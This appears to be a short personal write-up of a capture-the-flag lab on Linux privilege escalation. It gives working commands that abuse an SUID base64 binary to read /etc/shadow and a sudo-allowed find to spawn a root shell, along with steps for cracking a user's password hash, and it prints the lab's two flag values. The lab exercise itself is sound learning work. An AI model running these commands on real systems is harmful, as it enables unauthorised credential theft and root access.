Capstone

#CTF #write-up #SUID #sudo-l

Privilege Escalation

Check for SUID files

find / -perm -u=s -type f -ls 2>/dev/null

We found base64
Pasted image 20240819181358.png

Use https://gtfobins.github.io/ to exploit it.

We can read any file, we read /etc/shadow to see the hash of other users.

LFILE=/etc/shadow
base64 "$LFILE" | base64 --decode

Pasted image 20240819181615.png

On our machine crack the hash missy

Create a file passwd, copy the missy line of passwd
Pasted image 20240819181914.png
Create the shadow, copy the missy line of shadow
Pasted image 20240819182033.png
Unshadow the file using unshadow to the unshadowed file

unshadow passwd shadow > unshadowed

Crack the unshadowed file
Pasted image 20240819182246.png

Get the first flag

Login as missy

su missy

The flag is on /home/missy/Documents
Pasted image 20240819182541.png

flag1.txt

THM-42828719920544

Escalate to root

Check sudo -l for missy
Pasted image 20240819183619.png
Leverage find

sudo find / etc/passwd -exec /bin/bash \;

Pasted image 20240819183906.png
We are root now

Get the second flag

Pasted image 20240819184137.png

flag2.txt

THM-168824782390238

DLL hijacking

Replace the DLL by a malicious

Exploit know vulnerabilities

Tools
Robber
PowerSploit